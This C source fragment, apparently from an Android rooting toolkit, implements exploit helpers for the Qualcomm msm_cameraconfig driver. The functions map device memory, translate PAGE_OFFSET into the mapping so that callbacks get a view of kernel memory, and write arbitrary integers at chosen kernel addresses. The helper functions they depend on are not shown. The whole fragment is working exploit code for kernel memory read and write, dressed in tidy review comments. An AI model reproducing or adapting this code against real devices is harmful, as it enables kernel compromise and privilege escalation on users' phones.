/*
 * Map memory through the msm_cameraconfig helpers and hand the mapped view
 * to callback_func.
 *
 * callback_func   invoked once with (translated pointer, KERNEL_SIZE,
 *                 callback_param); its return value becomes ours.
 * callback_param  opaque pointer forwarded to callback_func unchanged.
 *
 * Returns false when the mapping could not be created, otherwise whatever
 * callback_func returned. The mapping is released before returning.
 */
static bool attempt_mmap_msm_cameraconfig_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
  int fd_video;
  int fd_config;
  void *mapping;
  void *kernel_view;
  bool callback_result;
  unsigned long int phys_offset = get_kernel_physical_offset();

  /* A zero offset is treated as "unknown": the helper keeps its own setting. */
  if (phys_offset != 0) {
    /* NOTE(review): 0x00008000 is an unnamed constant; its meaning is not
     * established by this block and it deserves a named definition. */
    msm_cameraconfig_set_kernel_phys_offset(phys_offset - 0x00008000);
  }

  mapping = msm_cameraconfig_mmap(&fd_video, &fd_config);
  if (mapping == MAP_FAILED) {
    return false;
  }

  /* Translate PAGE_OFFSET into the corresponding pointer inside the mapping. */
  kernel_view = msm_cameraconfig_convert_to_mmaped_address((void *)PAGE_OFFSET, mapping);
  callback_result = callback_func(kernel_view, KERNEL_SIZE, callback_param);

  /* Always tear the mapping down, whatever the callback reported. */
  msm_cameraconfig_munmap(mapping, fd_video, fd_config);

  return callback_result;
}
/*
 * Create the msm_cameraconfig mapping, run exploit_callback against its base
 * address, then release the mapping.
 *
 * exploit_callback  called once with (mapping base, user_data).
 * user_data         opaque pointer forwarded to exploit_callback unchanged.
 *
 * Returns false when the mapping could not be created, otherwise the value
 * returned by exploit_callback.
 */
bool msm_cameraconfig_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data), void *user_data)
{
  int fd_video;
  int fd_config;
  bool callback_result;
  void *mapping = msm_cameraconfig_mmap(&fd_video, &fd_config);

  if (mapping == MAP_FAILED) {
    return false;
  }

  callback_result = exploit_callback(mapping, user_data);

  /* The mapping and both descriptors are handed back to the helper for
   * cleanup, whether or not the callback succeeded. */
  msm_cameraconfig_munmap(mapping, fd_video, fd_config);

  return callback_result;
}
/*
 * Store one int at the location inside the msm_cameraconfig mapping that
 * corresponds to `address`.
 *
 * address  target address, translated into the mapping by
 *          msm_cameraconfig_convert_to_mmaped_address().
 * value    the int written to the translated location.
 *
 * Returns false when the mapping could not be created; otherwise true, once
 * the store has been performed and the mapping released.
 *
 * NOTE(review): the translated pointer is dereferenced with no range or
 * alignment check in this block; whether the helper validates `address`
 * cannot be told from here.
 */
bool msm_cameraconfig_write_value_at_address(unsigned long int address, int value)
{
  int fd_video;
  int fd_config;
  int *target;
  void *mapping = msm_cameraconfig_mmap(&fd_video, &fd_config);

  if (mapping == MAP_FAILED) {
    return false;
  }

  target = msm_cameraconfig_convert_to_mmaped_address((void *)address, mapping);
  *target = value;

  msm_cameraconfig_munmap(mapping, fd_video, fd_config);

  return true;
}